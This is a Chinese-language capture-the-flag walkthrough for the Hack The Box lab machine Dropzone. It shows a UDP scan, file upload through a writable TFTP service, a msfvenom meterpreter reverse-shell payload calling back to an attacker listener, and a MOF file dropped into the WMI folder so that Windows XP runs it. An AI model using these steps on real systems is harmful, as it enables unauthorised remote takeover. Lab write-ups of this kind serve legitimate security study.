dropzone通关攻略

栏目: 服务器 · 发布时间: 7年前

内容简介:今天我们的靶机是Dropzone,同样来自hack the box。hack the box实验室有很多靶机,难度从初级到专业级都有,本次我们的靶机属于专业级。任务是查看user.txt和root.txt文件内容。靶机Dropzone的IP地址是10.10.10.90.下面就正式开始对靶机进行渗透。

今天我们的靶机是Dropzone,同样来自hack the box。hack the box实验室有很多靶机,难度从初级到专业级都有,本次我们的靶机属于专业级。任务是查看user.txt和root.txt文件内容。

靶机Dropzone的IP地址是10.10.10.90.

下面就正式开始对靶机进行渗透。

首先用nmap来扫一下开放的端口和服务,这里使用的参数是-sU,如下所示:

nmap -sU -T4 10.10.10.90

扫描结果如图:

dropzone通关攻略

从图中可以看出,靶机开放了69端口,并且运行着TFTP服务。

我们使用tftp客户端连接到目标系统中,意外的发现我们竟然可以上传和下载文件。我们试着下载“boot.ini”文件到本地,然后退出tftp连接,在本地使用cat命令查看一下这个文件,发现目标系统运行的是Windows XP系统,如图所示:

dropzone通关攻略

不过我们没有找到对tftp服务进行利用的exp,所以我们打算使用MOF文件WMI利用来获取目标系统的反弹shell。

首先我们使用msfvenom生成一个可执行的木马文件,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.4 lport=443 -f exe > hack.exe

如图:

dropzone通关攻略

msf中还有一个模块叫“wbemexec.rb”,这个模块可以生成MOF文件(你可以在 这里 找到该文件),我们下载该文件,并对它进行编辑来运行我们自己的 shell 代码。修改后的代码,你可以从 这里 下载,如图所示:

dropzone通关攻略

接着我们使用tftp连接上去,然后上传hack.exe和MOF文件,命令如下:

tftp> binary
tftp> put hack.exe /WINDOWS/system32/hack.exe
tftp> put hack.mof /WINDOWS/system32/wbem/mof/hack.mof

如图:

dropzone通关攻略

在上传文件之前,我们先在本地设置一下监听,命令如下:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.4
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run

只要我们上传了MOF文件和payload,并得以执行,我们就可以获得一个反向shell。获得反向shell后,我们来查看一下系统信息,意外的发现,这个shell竟然就是一个administrator账户,查看信息命令:

meterpreter > sysinfo
meterpreter > getuid

结果如图:

dropzone通关攻略

我们进入到桌面,发现了root.txt文件,不过查看文件内容后,发现flag并不在该文件中,命令如下:

meterpreter > cd Administrator
meterpreter > ls
meterpreter > cd Desktop
meterpreter > ls
meterpreter > cat root.txt

如图:

dropzone通关攻略

可以看到桌面上还有另外一个目录flags,我们进入到该目录,发现了一个奇怪的文件,文件名是2 for the price of 1!.txt,这个文件给了我们一个提示,就是我们必须使用交换数据流来获取flag,交换数据流是NTFS文件系统的一个属性,这个属性可以用来隐藏数据。

meterpreter > cd flags
meterpreter > dir
meterpreter > cat "2 for the price of 1!.txt"

我们可以使用sysinternals工具集中的streams.exe文件来检查交换数据流(工具下载地址在 这里 )

接着,我们将streams.exe上传到目标系统中,然后生成一个shell,然后执行这个可执行文件来查找当前目录中的交换数据流,如此一来,我们就找到了user flag和root flag,命令如下:

meterpreter > upload /root/Downloads/Streams/streams.exe
meterpreter > shell
streams -accepteula -s .

结果如图:

dropzone通关攻略

本次靶机到此结束,谢谢大家!


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

最优化导论

最优化导论

Edwin K. P. Chong、Stanislaw H. Zak / 孙志强、白圣建、郑永斌、刘伟 / 电子工业出版社 / 2015-10 / 89.00

本书是一本关于最优化技术的入门教材,全书共分为四部分。第一部分是预备知识。第二部分主要介绍无约束的优化问题,并介绍线性方程的求解方法、神经网络方法和全局搜索方法。第三部分介绍线性优化问题,包括线性优化问题的模型、单纯形法、对偶理论以及一些非单纯形法,简单介绍了整数线性优化问题。第四部分介绍有约束非线性优化问题,包括纯等式约束下和不等式约束下的优化问题的最优性条件、凸优化问题、有约束非线性优化问题的......一起来看看 《最优化导论》 这本书的介绍吧!

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器